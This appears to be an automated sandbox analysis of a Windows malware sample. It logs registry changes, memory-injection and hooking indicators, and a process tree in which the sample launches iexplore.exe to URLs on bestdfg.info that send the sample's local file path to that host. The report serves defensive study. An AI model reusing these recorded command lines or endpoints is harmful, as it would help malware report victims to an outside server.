Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB84-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2D2E24CB-0CD5-458F-86EA-3E6FA22C8E64}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E06D8022-DB46-11CF-B4D1-00805F6CBBEA}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\FilterData = 02000000000060000200000000000000307069330000000000000000010000000000000000000000307479330000000060000000700000003170693308000000000000000100000000000000000000003074793300000000800000009000000083eb36e44f52ce119f530020af0ba77088eb36e44f52ce119f530020af0ba7707669647300001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05589FAF-C356-11CE-BF01-00AA0055595A}\InprocServer32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\FilterData = 0200000000004000020000000000000030706933000000000000000001000000000000000000000030747933000000006000000070000000317069330800000000000000010000000000000000000000307479330000000060000000800000007669647300001000800000aa00389b717aeb36e44f52ce119f530020af0ba77079eb36e44f52ce119f530020af0ba770	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDBD8D00-C193-11D0-BD4E-00A0C911CE86}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D3588AB0-0781-11CE-B03A-0020AF0BA770}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{A888DF60-1E90-11CF-AC98-00AA004C0FA9}\CLSID = "{A888DF60-1E90-11CF-AC98-00AA004C0FA9}"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A3-7548-11CF-A520-0080C77EF58A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}\CLSID = "{E4206432-01A1-4BEE-B3E1-3702C8EDC574}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A8DFB9A0-8A20-479F-B538-9387C5EEBA2B}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB84-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{FEB50740-7BEF-11CE-9BD9-0000E202599C}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E436EBB7-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2D2E24CB-0CD5-458F-86EA-3E6FA22C8E64}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB88-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6F26A6CD-967B-47FD-874A-7AED2C9D25A2}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D51BD5A5-7548-11CF-A520-0080C77EF58A}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB85-524F-11CE-9F53-0020AF0BA770}\0 = "0, 4, , 52494646, 8, 8, , 43445841666D7420, 36, 20, FFFFFFFF00000000FFFFFFFFFFFFFFFFFFFFFFFF, 646174610000000000FFFFFFFFFFFFFFFFFFFF00"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB86-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{59CE6880-ACF8-11CF-B56E-0080C7C4B68A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A888DF60-1E90-11CF-AC98-00AA004C0FA9}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CC785860-B2CA-11CE-8D2B-0000E202599C}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\FriendlyName = "AVI Decompressor"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6A08CF80-0E18-11CF-A24D-0020AFD79767}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\FriendlyName = "MIDI Parser"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{48025243-2D39-11CE-875D-00608CB78066}\FilterData = 020000000100800001000000000000003070693302000000000000000200000000000000000000003074793300000000480000005800000031747933000000006800000058000000646d637300001000800000aa00389b71000000000000000000000000000000007478747300001000800000aa00389b71	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E436EBB6-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB8-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}\CLSID = "{336475D0-942A-11CE-A870-00AA002FEAB5}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{07B65360-C445-11CE-AFDE-00AA006C14F4}\InprocServer32	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\FilterData = 0200000000004000020000000000000030706933000000000000000003000000000000000000000030747933000000008000000090000000317479330000000080000000a0000000327479330000000080000000b00000003170693308000000000000000100000000000000000000003074793300000000c0000000d000000083eb36e44f52ce119f530020af0ba7708beb36e44f52ce119f530020af0ba7708ceb36e44f52ce119f530020af0ba7708deb36e44f52ce119f530020af0ba7706175647300001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E5B4EAA0-B2CA-11CE-8D2B-0000E202599C}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B80AB0A0-7416-11D2-9EEB-006008039E37}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{336475D0-942A-11CE-A870-00AA002FEAB5}\FriendlyName = "MPEG-I Stream Splitter"	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A5-7548-11CF-A520-0080C77EF58A}\FilterData = 02000000000040000200000000000000307069330000000000000000010000000000000000000000307479330000000060000000700000003170693308000000000000000100000000000000000000003074793300000000700000007000000066696c6500001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1643E180-90F5-11CE-97D5-00AA0055595A}\CLSID = "{1643E180-90F5-11CE-97D5-00AA0055595A}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\FriendlyName = "Video Renderer"	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{FEB50740-7BEF-11CE-9BD9-0000E202599C}\FilterData = 020000000100004002000000000000003070693300000000000000000200000000000000000000003074793300000000700000008000000031747933000000007000000090000000317069330800000000000000010000000000000000000000307479330000000070000000a00000007669647300001000800000aa00389b7180eb36e44f52ce119f530020af0ba77081eb36e44f52ce119f530020af0ba77000000000000000000000000000000000	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\FilterData = 02000000000060000200000000000000307069330000000000000000010000000000000000000000307479330000000060000000700000003170693308000000000000000100000000000000000000003074793300000000800000009000000083eb36e44f52ce119f530020af0ba77088eb36e44f52ce119f530020af0ba7707669647300001000800000aa00389b7100000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{E4206432-01A1-4BEE-B3E1-3702C8EDC574}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Media Type\{E436EB83-524F-11CE-9F53-0020AF0BA770}\{E436EB8C-524F-11CE-9F53-0020AF0BA770}	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\FilterData = 0200000000004000020000000000000030706933000000000000000001000000000000000000000030747933000000006000000070000000317069330c000000000000000100000000000000000000003074793300000000800000008000000083eb36e44f52ce119f530020af0ba770a3d51bd54875cf11a5200080c77ef58a00000000000000000000000000000000	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\FriendlyName = "VGA 16 Color Ditherer"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06B32AEE-77DA-484B-973B-5D64F47201B0}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\Instance\{48025243-2D39-11CE-875D-00608CB78066}\FriendlyName = "Internal Script Command Renderer"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{48025243-2D39-11CE-875D-00608CB78066}	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

FunshionInstall_C105806.exe

pid	process
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe
3092	FunshionInstall_C105806.exe

Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

IEXPLORE.EXE

pid	process
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 48 IoCs

Processes:

IEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4840	IEXPLORE.EXE
4840	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4848	IEXPLORE.EXE
4848	IEXPLORE.EXE
4848	IEXPLORE.EXE
4848	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
456	IEXPLORE.EXE
456	IEXPLORE.EXE
456	IEXPLORE.EXE
456	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
1936	IEXPLORE.EXE
1936	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4196	IEXPLORE.EXE
4196	IEXPLORE.EXE
4196	IEXPLORE.EXE
4196	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
4848	IEXPLORE.EXE
4848	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
1124	IEXPLORE.EXE
1124	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
456	IEXPLORE.EXE
456	IEXPLORE.EXE
4748	IEXPLORE.EXE
4748	IEXPLORE.EXE
3196	IEXPLORE.EXE
3196	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exeiexplore.exeIEXPLORE.EXEiexplore.exeiexplore.exeiexplore.exeFunshionInstall_C105806.exeiexplore.exeiexplore.exeiexplore.exeiexplore.exe

description	pid	process	target process
PID 2152 wrote to memory of 4336	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 4336	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 4336	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 4336 wrote to memory of 4748	4336	iexplore.exe	IEXPLORE.EXE
PID 4336 wrote to memory of 4748	4336	iexplore.exe	IEXPLORE.EXE
PID 4748 wrote to memory of 4840	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 4840	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 4840	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 2152 wrote to memory of 1612	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 1612	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 1612	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 1612 wrote to memory of 4224	1612	iexplore.exe	IEXPLORE.EXE
PID 1612 wrote to memory of 4224	1612	iexplore.exe	IEXPLORE.EXE
PID 4748 wrote to memory of 1936	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 1936	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 1936	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 2152 wrote to memory of 2428	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 2428	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 2428	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2428 wrote to memory of 4660	2428	iexplore.exe	IEXPLORE.EXE
PID 2428 wrote to memory of 4660	2428	iexplore.exe	IEXPLORE.EXE
PID 4748 wrote to memory of 4848	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 4848	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 4848	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 2152 wrote to memory of 4356	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 4356	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 4356	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 4356 wrote to memory of 3464	4356	iexplore.exe	IEXPLORE.EXE
PID 4356 wrote to memory of 3464	4356	iexplore.exe	IEXPLORE.EXE
PID 4748 wrote to memory of 456	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 456	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 456	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 2152 wrote to memory of 3092	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	FunshionInstall_C105806.exe
PID 2152 wrote to memory of 3092	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	FunshionInstall_C105806.exe
PID 2152 wrote to memory of 3092	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	FunshionInstall_C105806.exe
PID 3092 wrote to memory of 3424	3092	FunshionInstall_C105806.exe	regsvr32.exe
PID 3092 wrote to memory of 3424	3092	FunshionInstall_C105806.exe	regsvr32.exe
PID 3092 wrote to memory of 2204	3092	FunshionInstall_C105806.exe	regsvr32.exe
PID 3092 wrote to memory of 2204	3092	FunshionInstall_C105806.exe	regsvr32.exe
PID 3092 wrote to memory of 2204	3092	FunshionInstall_C105806.exe	regsvr32.exe
PID 2152 wrote to memory of 4400	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 4400	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 4400	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 4400 wrote to memory of 3580	4400	iexplore.exe	IEXPLORE.EXE
PID 4400 wrote to memory of 3580	4400	iexplore.exe	IEXPLORE.EXE
PID 2152 wrote to memory of 3296	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 3296	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 3296	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 3296 wrote to memory of 2140	3296	iexplore.exe	IEXPLORE.EXE
PID 3296 wrote to memory of 2140	3296	iexplore.exe	IEXPLORE.EXE
PID 4748 wrote to memory of 4196	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 4196	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 4748 wrote to memory of 4196	4748	IEXPLORE.EXE	IEXPLORE.EXE
PID 2152 wrote to memory of 2120	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 2120	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 2120	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2120 wrote to memory of 4224	2120	iexplore.exe	IEXPLORE.EXE
PID 2120 wrote to memory of 4224	2120	iexplore.exe	IEXPLORE.EXE
PID 2152 wrote to memory of 1716	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 1716	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 2152 wrote to memory of 1716	2152	4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe	iexplore.exe
PID 1716 wrote to memory of 1632	1716	iexplore.exe	IEXPLORE.EXE
PID 1716 wrote to memory of 1632	1716	iexplore.exe	IEXPLORE.EXE
PID 4748 wrote to memory of 1124	4748	IEXPLORE.EXE	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe
"C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2152

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=1123&i=ie&8383cb5a51f4672ae32da63c639759c8a85363ae=8383cb5a51f4672ae32da63c639759c8a85363ae&uu=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:4336

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=1123&i=ie&8383cb5a51f4672ae32da63c639759c8a85363ae=8383cb5a51f4672ae32da63c639759c8a85363ae&uu=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4748

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:17410 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:82948 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1936

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:82954 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4848

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:17426 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:456

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:17438 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4196

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:82988 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1124

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4748 CREDAT:83004 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3196

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Program Files\Internet Explorer\IEXPLORE.EXE
"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a1&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
3⤵
- Modifies Internet Explorer settings
PID:4224

C:\Program Files (x86)\Internet Explorer\iexplore.exe
"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/rfrfrfrfrf.php?gg=a2&tt=1123&ur=C:\Users\Admin\AppData\Local\Temp\4610de1c764c7f93dd3545e866af356c0a1752d82fa574440360464066600050&8383cb5a51f4672ae32da63c639759c8a85363ae
2⤵
- Suspicious use of WriteProcessMemory
PID:2428

C:\Program Files\Internet Explorer\IEXPLORE.EXE
